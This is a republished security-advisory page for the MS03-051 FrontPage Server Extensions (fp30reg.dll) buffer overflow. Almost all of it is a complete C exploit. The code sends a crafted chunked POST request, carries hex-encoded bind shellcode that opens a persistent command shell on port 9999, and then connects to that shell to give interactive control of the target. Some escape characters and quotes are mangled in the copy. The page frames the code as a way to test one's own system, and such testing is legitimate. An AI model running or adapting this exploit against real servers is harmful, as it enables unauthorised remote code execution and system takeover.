‘Microsoft FrontPage Server Extensions Buffer Overflow (fp30reg.dll)’

Summary

‘As we reported in our previous article: Buffer Overrun in Microsoft FrontPage Server Extensions Could Allow Code Execution, a vulnerability in FrontPage’s fp30reg.dll allows remote attackers to cause the product to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by Adik.’


Details

Exploit:
/*******************************************************************************

Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore

Exploit by Adik netmaniac hotmail kg

Binds persistent command shell on port 9999
Tested on
    Windows 2000 Professional SP3 English version
    (fp30reg.dll ver 4.0.2.5526)

-[ 13/Nov/2003 ]-
********************************************************************************/

#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,’ws2_32′)

#define VER ‘0.1’

/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
  0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
  0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
  0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
  0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
  0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
  0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
  0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
  0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
  0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
  0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
  0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
  0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
  0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
  0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
  0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
  0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
  0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
  0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
  0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
  0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
  0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
  0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell (int sock);
long gimmeip(char *hostname);

int main(int argc,char *argv[])
{
    WSADATA wsaData;
    struct sockaddr_in targetTCP;
    struct hostent *host;
    int sockTCP,s;
    unsigned short port = 80;
    long ip;
    unsigned char header[]= ‘POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1rn’;
                                unsigned char packet[3000],data[1500];
    unsigned char ecx[] = ‘xe0xf3xd4x67’;
    unsigned char edi[] = ‘xffxd0x90x90’;
    unsigned char call[] = ‘xe4xf3xd4x67’;//overwrite .data section of fp30reg.dll
    unsigned char shortjmp[] = ‘xebx10’;
    
    printf(‘n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-nn’
    ‘ by Adik < netmaniac [at] hotmail.KG >nn’, VER);
    if(argc < 2)
    {
      
      printf(‘ Usage: %s [Target] <port>n’
          ‘ eg: fp30reg.exe 192.168.63.130nn’,argv[0]);
      return 1;
    }
    if(argc==3)
      port = atoi(argv[2]);
        WSAStartup(0x0202, &wsaData);
    printf(‘[*] Target:t%s tPort: %dnn’,argv[1],port);
    ip=gimmeip(argv[1]);
        memset(&targetTCP, 0, sizeof(targetTCP));
    memset(packet,0,sizeof(packet));
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(port);
  sprintf(packet,’%sHost: %srnTransfer-Encoding: chunkedrn’,header,argv[1]);
  memset(data, 0x90, sizeof(data)-1);
  data[sizeof(data)-1] = ‘x0′;
  memcpy(&data[16],edi,sizeof(edi)-1);
  memcpy(&data[20],ecx,sizeof(ecx)-1);
  memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
  memcpy(&data[250+14],call,sizeof(call)-1);
  memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
  sprintf(packet,’%sContent-Length: %drnrn%xrn%srn0rnrn’,packet,strlen(data),strlen(data),data);
        if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf(‘[x] Socket not initialized! Exiting…n’);
        WSACleanup();
                return 1;
    }
    printf(‘[*] Socket initialized…n’);
    if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
      printf(‘[*] Connection to host failed! Exiting…n’);
      WSACleanup();
      exit(1);
    }
    printf(‘[*] Checking for presence of fp30reg.dll…’);
    if (send(sockTCP, packet, strlen(packet),0) == -1)
    {
        printf(‘[x] Failed to inject packet! Exiting…n’);
        WSACleanup();
                return 1;
    }
    memset(packet,0,sizeof(packet));
    if (recv(sockTCP, packet, sizeof(packet),0) == -1)
    {
        printf(‘[x] Failed to receive packet! Exiting…n’);
        WSACleanup();
                return 1;
    }
    if(packet[9]==’1′ && packet[10]==’0′ && packet[11]==’0′)
      printf(‘ Found!n’);
    else
    {
      printf(‘ Not Found!! Exiting…n’);
      WSACleanup();
      return 1;
    }
    printf(‘[*] Packet injected!n’);
    closesocket(sockTCP);
    printf(‘[*] Sleeping ‘);
    for(s=0;s<13000;s+=1000)
    {
      printf(‘. ‘);
      Sleep(1000);
    }
    printf(‘n[*] Connecting to host: %s on port 9999’,argv[1]);
    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf(‘n[x] Socket not initialized! Exiting…n’);
        WSACleanup();
                return 1;
    }
    targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(9999);
    if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
      printf(‘n[x] Exploit failed or there is a Firewall! Exiting…n’);
      WSACleanup();
      exit(1);
    }
    printf(‘n[*] Dropping to shell…nn’);
    cmdshell(sockTCP);
        return 0;
}
/*********************************************************************************/
void cmdshell (int sock)
{
 struct timeval tv;
 int length;
 unsigned long o[2];
 char buffer[1000];
 
 tv.tv_sec = 1;
 tv.tv_usec = 0;

 while (1)
 {
  o[0] = 1;
  o[1] = sock;

  length = select (0, (fd_set *)&o, NULL, NULL, &tv);
  if(length == 1)
  {
    length = recv (sock, buffer, sizeof (buffer), 0);
    if (length <= 0)
    {
      printf (‘[x] Connection closed.n’);
      WSACleanup();
      return;
    }
    length = write (1, buffer, length);
    if (length <= 0)
    {
      printf (‘[x] Connection closed.n’);
      WSACleanup();
      return;
    }
  }
  else
  {
    length = read (0, buffer, sizeof (buffer));
    if (length <= 0)
    {
      printf(‘[x] Connection closed.n’);
      WSACleanup();
      return;
    }
    length = send(sock, buffer, length, 0);
    if (length <= 0)
    {
      printf(‘[x] Connection closed.n’);
      WSACleanup();
      return;
    }
  }
}

}
/*********************************************************************************/
long gimmeip(char *hostname)
{
  struct hostent *he;
  long ipaddr;
  
  if ((ipaddr = inet_addr(hostname)) < 0)
  {
    if ((he = gethostbyname(hostname)) == NULL)
    {
      printf(‘[x] Failed to resolve host: %s! Exiting…nn’,hostname);
      WSACleanup();
      exit(1);
    }
    memcpy(&ipaddr, he->h_addr, he->h_length);
  }
  return ipaddr;
}
/*********************************************************************************/’

Categories: Exploits